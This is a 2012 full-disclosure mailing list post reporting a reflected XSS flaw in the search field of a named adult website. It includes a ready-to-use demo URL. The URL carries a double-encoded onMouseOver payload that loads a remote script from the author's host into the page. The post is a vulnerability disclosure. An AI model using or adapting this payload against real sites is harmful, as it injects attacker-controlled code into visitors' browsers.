[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4F9223FB.2090609@xiscosoft.es>
Date: Sat, 21 Apr 2012 05:05:31 +0200
From: klondike <klondike@...cosoft.es>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS parameter injection in the search field of
http://chicasdetorbe.com
Hello,
Yesterday I discovered a funny XSS injection in the website
http://chicasdetorbe.com which is an affiliate site of the popular
website http://www.putalocura.com/
Despite my efforts at contacting with the site owner I received silence
as answer, I suppose because he though this was either not serious or he
just wanted to ignore me. Thus after the having sent various warnings of
Full Disclosure I have decided to publish the whole thing.
The vulnerability:
The vulnerability is quite simple, the contents of the search string are
pasted escaping characters like ' " and \ inside the value field of the
input thus you can insert which ever attributes you want which allows
for event based injection as long as you don't use the characters ' " or
\ since they will be escaped with an extra \.
Take into account that even if they tried to detect dangerous strings
this would be bypasable by adding <> since those are removed by the
content manager.
The demo (the site is NSFW so be careful):
1. Go to:
http://chicasdetorbe.com/?q=%22+onMouseOver%3Deval%28unescape%28%2F%2573%253d%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%2572%2565%2561%2574%2565%2545%256c%2565%256d%2565%256e%2574%2528%2527%2573%2563%2572%2569%2570%2574%2527%2529%253b%2573%252e%2573%2572%2563%253d%2527%2568%2574%2574%2570%253a%252f%252f%256b%256c%256f%256e%2564%2569%256b%2565%252e%2565%2573%252f%2564%2565%256d%256f%2574%256f%2572%2562%2565%252e%256a%2573%2527%253b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2567%2565%2574%2545%256c%2565%256d%2565%256e%2574%2573%2542%2579%2554%2561%2567%254e%2561%256d%2565%2528%2527%2568%2565%2561%2564%2527%2529%255b%2530%255d%252e%2561%2570%2570%2565%256e%2564%2543%2568%2569%256c%2564%2528%2573%2529%253b%2F.source%29%29%2F%2F
(You may need to copy and paste the whole link).
2.Put the mouse over the search bar on the top left.
3. Enjoy! (The text is in Spanish and basically offer links to free porn
and photos of chonis: a social group in Spain).
klondike
Download attachment "signature.asc" of type "application/pgp-signature" (263 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists